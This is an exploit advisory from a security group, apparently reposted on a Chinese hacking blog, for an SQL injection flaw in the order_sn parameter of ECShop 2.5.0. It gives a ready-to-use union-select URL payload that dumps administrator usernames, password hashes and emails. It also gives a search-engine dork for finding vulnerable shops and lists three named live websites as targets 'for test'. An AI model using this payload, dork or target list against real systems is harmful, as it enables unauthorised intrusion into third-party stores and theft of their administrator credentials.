ECShop 2.5.0 (order_sn) Remote SQL Injection Vulnerability

######################### Securitylab.ir ########################

# Application Info:

# Name: ECSHOP

# Version: 2.5.0

# Website: http://www.ecshop.com

#################################################################

# Discoverd By: Securitylab.ir

# Website: http://securitylab.ir

# Contacts: admin[at]securitylab.ir & info@securitylab[dot]ir

#################################################################

# Vulnerability Info:

# Type: Sql Injection

# Risk: High

# Dork: "Powered by ECShop v2.5.0"

#===========================================================

# http://site.com/user.php?act=order_query&order_sn=' union select 1,2,3,4,5,6,concat(user_name,0x7c,password,0x7c,email),8 from ecs_admin_user/*

#===========================================================

#################################################################

# For test:

# http://www.lobang99.com/store

# http://www.amteore.com

# http://www.vostart.com/web/eng

#################################################################

# Securitylab Security Research Team

###################################################################

# milw0rm.com [2009-04-27]

原创文章如转载，请注明：转载自心动吧黑客BLOG [ http://www.abcxd.com/abcxd/ ]

本文链接地址：http://www.abcxd.com/abcxd/abcxdArticle/PHPoday/ECShop2.5.0.html

导航

心动吧黑客BLOG

自发研究:须要多维思想而且要想不可能为可能的人才能做到

2009-4-28 13:52:37

Tags: ECShop SQL Injection SQL注入 Vulnerability 漏洞

发布:kissjetg | 分类:(D:)PHP程序漏洞 | 评论:0 | 引用:0 | 浏览:

黑客榜之热文排行

黑客榜之本年排行

黑客榜之本月排行

黑客榜之随机文章

网站分类

搜索内容

最新评论及回复

最近发表

所属分类下的文章

日历

Copyright ⊙ 2004-2009 心动吧 UrL:ABCXD.CoM All RiGhts Reserved

导航

心动吧黑客BLOG

2009-4-28 13:52:37